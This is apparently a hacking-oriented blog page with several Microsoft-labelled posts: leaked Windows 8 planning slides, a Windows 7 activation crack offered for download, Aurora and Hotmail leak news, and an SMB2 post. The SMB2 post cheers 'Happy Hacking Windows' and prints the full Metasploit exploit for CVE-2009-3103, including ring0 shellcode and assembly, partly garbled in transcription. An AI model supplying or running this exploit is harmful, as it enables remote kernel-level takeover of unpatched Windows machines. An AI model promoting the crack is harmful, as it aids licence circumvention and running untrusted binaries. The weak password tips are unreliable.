Related Informations Sites

Websites may Interest You

RSS Subscription

Subscribe via RSS reader:
Subscribe via Email Address:
 
Showing posts with label Microsoft. Show all posts
Showing posts with label Microsoft. Show all posts

Windows 8 Plans Leaked: Disclosure and slides

Posted By HinD On 5:22 AM 0 comments


A big thanks to @floo1989 for the heads-up! Over the weekend, the Italian Windows site “Windowsette” got a hold of some super secret squirrel Microsoft presentations apparently laying around on the internet somewhere. I took a look through every single one of these, slide-by-slide, so I’m quite confident these are the real deal. I just feel bad for the poor sap who either leaked these or inadvertently shared these with the world. Long story short, these slide decks are chock full of internal thinking on Windows 8 — everything from customer target audiences to the Windows 8 developer market to the Windows 8 product cycle and much, much more. As a preface, I’ve taken many screen shots of relevant slides for inclusion with this article, so click on them to see their full-sized versions. I’ll elaborate on some and allow the others to explain themselves. Lastly, I’ll be updating this post as I find more contained within the slide decks. Now, without further adieu, let’s get started!



Microsoft Looks to Apple



Included in these presentations is a rather telling (but obvious) slide which shows that Microsoft is clearly paying attention to Apple while planning Windows 8. Titled, “How Apple does it: A virtuous cycle,” Microsoft has broken down Apple’s UX/Brand Loyalty cycle and cited its value. Though it’s fairly obvious, the takeaway here is that Microsoft is aiming to give Windows the very same “it just works” status that Apple’s products are known for:





Windows 8 Prototype Machine

Speaking of Apple, I think the following prototype looks like some rejected Mac prototype (i.e. I don’t like it very much — at least from this angle). The wallpaper is the old Windows 7 beta wallpaper (as you can see by the beta fish in the center of it) and there is clearly some build information on the bottom right-hand corner of the desktop. This may well be something left over from Windows 7 planning, but being included in Windows 8 planning documentation, I figured it was worth tossing in. Here’s the machine and below it, its specifications:







Windows 8 Product Cycle

The following slide isn’t too telling in and of itself, but it serves to show how Microsoft has chosen to divide its Windows 8 product cycle into 3 main phases:
  • Planning (from Framing to Vision): Big picture thinking, themes then scenarios, and feature identification list.
  • Development (from Vision to Beta): Design and build features, refine SKUs (shelf-keeping units) and value propositions, and begin sharing code.
  • Readiness (from Beta to GA+90): Feature complete and bug-fixing, establish and track readiness metrics, and focus on creating great Dell + Windows experiences.
Of note, these slides were apparently leaked or inadvertently released after being given to one Derek Goode at HP. Likewise, many of the discussions throughout the slides address HP, so the 3rd phase above making reference to Dell interests me. Anyway, here is the slide of note:




Windows 8: Identity Evolved

There appears to be considerable planning taking place as to how a user will access Windows. Right off the bat, one of my favorites is the following prototype which shows a user logging in via facial recognition! Basically, you enroll your face, then all you should have to do from that point forward is sit down, have your webcam get a look at you and then log you in based on facial recognition:


The following slide details other considerations for Windows 8 where identity is concerned. Namely, user accounts will still be the primary method of accessing Windows for individuals, fast user switching is a continued focus, and most notably, Windows accounts could be connected to the cloud which would allow for roaming settings/preferences between PCs and devices and PCs to log on to websites on the user’s behalf — all marking an evolution of Windows identity from being machine-centric to user-centric.




Trends Shaping the Planning of Windows 8

Shaping the planning of Windows 8 are explosion of form factors (laptops, netbooks, slates, etc.), assumed connectivity (focus on software + services for end-user scenarios), collision of enterprise and personal worlds (aiming to help customers have a seamless experience across their personal and professional lies), personal content experience, and more. The following slide elaborates:





Windows 8 Consumer Target Audiences

As we see detailed in the slide below, enthusiasts and mainstream consumers are the two main consumer target audiences for Windows 8:


Windows 8 Developer Market

No surprise here that Microsoft’s addressable developer market for Windows 8 spans from hobbyist/non-professional developers to professional developers to science, technology, engineering, and math developers:



Windows 8 Differentiation Goals

As for form factors, Microsoft’s 3 main focuses for Windows 8 appear to be Slate, Laptop, and All-in-One (all detailed in slides below). Additionally, customization areas include Applications, Devices, Multimedia, Help and Support, and UI and Theming (all also detailed in slides below). One of the key takeaways here is Microsoft detailing “Slate” as a major form factor focus. This means the Windows-based Slate devices are still likely to make an appearance at some point:
and many other informative slides........
credits:crazyscriptz

Get Original WINDOWS 7 :FREE

Posted By HinD On 11:33 AM 0 comments
Many of us have tried our hand on the rc or beta version of windows 7, but after the launch of stable version of windows 7, maximum users have been pissed by seeing the message at the starting of their rc or beta version of windows 7.
Message is something like, you are not using a genuine copy of windows or you may be a victim or piracy something like that. so how remove this message or question can be re framed as how to get the original windows 7 without paying a penny.


second question could be from those users who have not tried their hand on any form of windows 7 but they want to use windows 7 without paying anything just like everybody is using xp is freely available on net with all service packs.


Answer to the question of both kind of users lies in a new software developed by a hacker known by the name of HAZAR.
He developed a software which removes the file which is responsible for validating the authenticity or genuinity of the copy of windows.




First install any copy of windows 7 which is freely available say rc or beta version.


After that install this software, on that system after one month because any version of windows 7 allows you to use it and receive all the updates for free.After one month it starts showing you messages of piracy and all troubles start from there.


So, install this software , it will require your system to restart , so dont worry let your system restart. And restarting your system you will be free from all those unwanted messages which you used to see at the beginning of starting of windows 7.


Not only this , you will be able to receive the updates like a genuine copy and your windows copy will become just like a genuine copy of windows 7. It will also enable your windows copy to bypass the sofware check of windows defender like a genuine copy.


Hazar claims that " there will be no windows activation section in control panel, no nags, no prompts, no slmgr, nothing" 


Download this software from here


NOTE:
1. I have tried this sofware on my own, and i had no problem in using this and operating system behaved like a genuine copy.
2.All the information have collected from varios websites, no proper authentication.

LOLZZZZZZZ MICROSOFT...

Posted By HinD On 6:51 PM 0 comments

EVER WONDERED WHT WOULD HAVE HAPPENED IF MICROSOFT WOULD HAVE MADE VI EDITOR


"AURORA" IE EXPLOIT THROUGH WHICH GOOGLE WAS HACKED

Posted By HinD On 9:14 AM 0 comments

The biggest news which HIT this year was chinese hacking of GOOGLE .
According to the experts , attack vector of china which hit the companies like Google, Adobe many other in different part of the world was a 0day exploit was basically an invalid pointer reference of IE.
Even Microsoft admitted that the Vulnerability in IE caused the hacking of the google.
According to the Microsoft only IE 6 was used for the attack, exploiting which crackers gained the access to the network of more than 20 + companies.
According to the experts main aim of the hackers were to gain the access of the password of some chinese human right activists.Probably they were also successful in their attempt, which made google to announce they might shut down their china office.

The name "Aurora" is predicted by the researchers who think that crackers have named the mission with same name, as this name was found in the exploit during analysis.

Within Hours Metaspoilt release the exploit of IE 6 showing how they would have done this by simple example.
You can see the example at given link:http://vimeo.com/8771582
Code used for exploit(example):
As this blogspot didnt allow me to write the tags, so i am providing you another link for the code.

Hacked Hotmail AccoUnts

Posted By HinD On 11:54 AM 0 comments

An anonymous user posted the hacked user id and password of more than 10,000 users of hotmail account on pastebin.com on oct 1 , 2009. Since then all details have been removed from the website. But as of preventative measure microsoft verified these hacked account news and froze all the affected accounts, in case you are among one of them u can use the recover function of hotmail, to recover your account.
Factors to be considered to verify wether your account is hacked or not:-
i) Majority of the account hacked were from europe
ii) Since , as per news 20k accounts were hacked, all the accounts which were posted in alphabetical order , the list of account which were published were starting from "a" and "b".
iii) If you still think that your account was hacked, then simply change the password.

General view on the way of hacking was done is the use of phising technique, that too was wrongly designed, as whenever u entered your password it was giving ERROR MESSAGE.
General Observation from the list:-
i)123456 was the most probable password as it was used in 64 of the accounts posted.
ii) 123456789 was the second most probable password as it was used in 18 accounts
iii) very weak passwords were used, as maximum of the accounts had password in alphanumeric a-z in same caps.

This showed that a large part of the internet users are still careless about their confidential data. Which needs the immediate attention , and spreading up of the knowledge of using strong password and the way these can be build.

Tips for making strong password:
i) Always use some thing which you can easily remember like telephone number SAY "1234567890"
ii)Try to mix the numeric numbers with alphanumeric keys like by your nick name say "SLAYER"
iii)Try to use the special keys like "@, #,$,%,^,etc"
iv)Try to use all the above 3 methods mix it up, if possible and convinient for you to remember try to change the caps order
eg. if i make the password then it could be 1234567890@sL@yeR, $L@yer@1234567890
see how easy it is to make the strong password and make your account secure... and yes be aware of phising as it doesnt matter how strong your password is, by this trick you yourself is supplying the password.If you think your password have been compromised by phising then immediatly change it.

reCenT BuG in MicroSoft :revealed Date : sep 7

Posted By HinD On 2:51 AM 0 comments
Hello guys, one more bug in microsoft has been revealed that enables the attacker to run the unauthorized software on victim's machine. The most happening news this time is that.. the hackers who have revealed this bug.. have made the source code public.. so this time code is available more easily than ever else.
One more software company has written their own code to exploit this bug, but their source code is available for the company's payee subscribers only.

Interesting news that, Microsoft has not fixed the bug till todays date. This bug was revealed on 7th sept 2009.
So, this bug is still alive.......

Open source lover have got 1 more reason to cheer!!!!
Happy Hacking Windows

I have uploaded the source code on the net also whose link is given below... alongwith that i have posted the code here tooo which i have got from net.
cheers Guys!!!!!!!!

Recently Microsoft admitted that SMB2 and network sharing protocol can be hacked, and it can be used to take the control of machine.
Since SMB2 protcol has been introduced in vista and latger versions, so the versions before vista like xp etc are unaffected by the this threat.
For immediate help:
i) Microsoft has asked to disable SMB2 by editing windows registry else
ii) Block the port no 139 and 445 at firewall.
--------------------------------------------------------------------------------
http://rapidshare.com/files/286432299/code_to_exploit_bug07sept2009.rb.html
-------------------------------------------------------------------------------
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < info =" {})"> 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
without SP1 does not seem affected by this flaw.
},

'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2009-3103'],
['BID', '36299'],
['OSVDB', '57799'],
['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],
['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::Raw,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86 ],
'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)
'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).
'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer
'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0
}
],
],
'DefaultTarget' => 0
))

register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )
end

# The payload works as follows:
# * Our sysenter handler and ring3 stagers are copied over to safe location.
# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
# * The srv2.sys thread we are in is placed in a halted state.
# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
def ring0_x86_payload( opts = {} )

# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00

# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
kstager = opts['StagerAddressKernel'] || 0xFFDF0400

# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
ustager = opts['StagerAddressUser'] || 0x7FFE0400

# Target SYSTEM process to inject ring3 payload into.
process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')

# A simple hash of the process name based on the first 4 wide chars.
# Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager)
checksum = process[0] + ( process[2] <<> ring3 payload blob. Full assembly listing given below.
r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
# Patch in the required values.
r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") )
r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
return r0 + payload.encoded
end

def exploit
print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
connect

# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest
# and srv2!SrvProcPartialCompleteCompoundedRequest
dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]

data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34
data += [ 0x42424242 ].pack("V") * 7 # Unused
data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
data += [ 0x41414141 ].pack("V") * 6 # Unused
data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode

# We gain code execution by returning into the SMB packet, begining with its header.
# The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
# This will cause an access violation if executed as we can never set EBX to a valid pointer.
# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.
# This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer.
# We patch the Signature1 value to be a jump forward into our shellcode.
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
packet['Payload']['SMB'].v['Flags1'] = 0x18
packet['Payload']['SMB'].v['Flags2'] = 0xC853
packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']
packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.
packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...
packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )
packet['Payload'].v['Payload'] = data

packet = packet.to_s

print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
sock.put( packet )


wtime = datastore['WAIT'].to_i
print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )
stime = Time.now.to_i


poke_logins = %W{Guest Administrator}
poke_logins.each do |login|
begin
sec = connect(false)
sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
rescue ::Exception => e
sec.socket.close
end
end

while( stime + wtime > Time.now.to_i )
select(nil, nil, nil, 0.25)
break if session_created?
end

handler
disconnect
end

end

=begin
;===================================================================================
; sf
; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape.
; http://www.uninformed.org/?v=3&a=4&t=sumry
;===================================================================================
[bits 32]
[org 0]
;===================================================================================
ring0_migrate_start:
cld
cli
jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address
ring0_migrate_patch:
pop esi ; pop off ring0_stager_start address
; get current sysenter msr (nt!KiFastCallEntry)
push 0x176 ; SYSENTER_EIP_MSR
pop ecx
rdmsr
; save origional sysenter msr (nt!KiFastCallEntry)
mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax
; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ]
; patch sysenter msr to be our stager
mov eax, edi
wrmsr
; copy over stager to shared memory
mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) )
rep movsb
sti ; set interrupt flag
; Halt this thread to avoid problems.
ring0_migrate_idle:
hlt
jmp short ring0_migrate_idle
ring0_migrate_bounce:
call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack
;===================================================================================
; This stager will now get called every time a ring3 process issues a sysenter
ring0_stager_start:
push byte 0 ; alloc a dword for the patched return address
pushfd ; save flags and registers
pushad
call ring0_stager_eip
ring0_stager_eip:
pop eax
; patch in the real nt!KiFastCallEntry address as our return address
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ]
mov [ esp + 36 ], ebx
; see if we are being told to remove our sysenter hook...
cmp ecx, 0xDEADC0DE
jne ring0_stager_hook
push 0x176 ; SYSENTER_EIP_MSR
pop ecx
mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address
xor edx, edx
wrmsr
xor eax, eax ; clear eax (the syscall number) so we can continue
jmp short ring0_stager_finish
ring0_stager_hook:
; get the origional r3 return address (edx is the ring3 stack pointer)
mov esi, [ edx ]
; determine if the return is to a "ret" instruction
movzx ebx, byte [ esi ]
cmp bx, 0xC3
; only insert our ring3 stager hook if we are to return to a single ret (for stability).
jne short ring0_stager_finish
; calculate our r3 address in shared memory
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ]
lea ebx, [ ebx + ring3_start - ring0_stager_start ]
; patch in our r3 stage as the r3 return address
mov [ edx ], ebx
; detect if NX is present (clobbers eax,ebx,ecx,edx)...
mov eax, 0x80000001
cpuid
and edx, 0x00100000 ; bit 20 is the NX bit
jz short ring0_stager_finish
; modify the correct page table entry to make our ring3 stager executable
mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically).
add edx, 4
and dword [ edx ], 0x7FFFFFFF ; clear the NX bit
; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set).
ring0_stager_finish:
popad ; restore registers
popfd ; restore flags
ret ; return to real nt!KiFastCallEntry
ring0_stager_data:
dd 0xFFFFFFFF ; saved nt!KiFastCallEntry
dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400)
dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400)
;===================================================================================
ring3_start:
pushad
push byte 0x30
pop eax
cdq ; zero edx
mov ebx, [ fs : eax ] ; get the PEB
cmp [ ebx + 0xC ], edx
jz ring3_finish
mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS)
mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string)
add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process).
mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00'
add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s'
cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C)
jne ring3_finish ; if we are not currently in the correct process, return to real caller
call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook
call ring3_stager ; and then call the real ring3 payload
jmp ring3_finish ; should the payload return we can resume this thread correclty.
ring3_cleanup:
mov ecx, 0xDEADC0DE ; set the magic value for ecx
mov edx, esp ; save our esp in edx for sysenter
sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
ring3_finish:
popad
ret ; return to the origional system calls caller
;===================================================================================
ring3_stager:
; ...ring3 stager here...
;===================================================================================
=end
============================================================================
Networkworld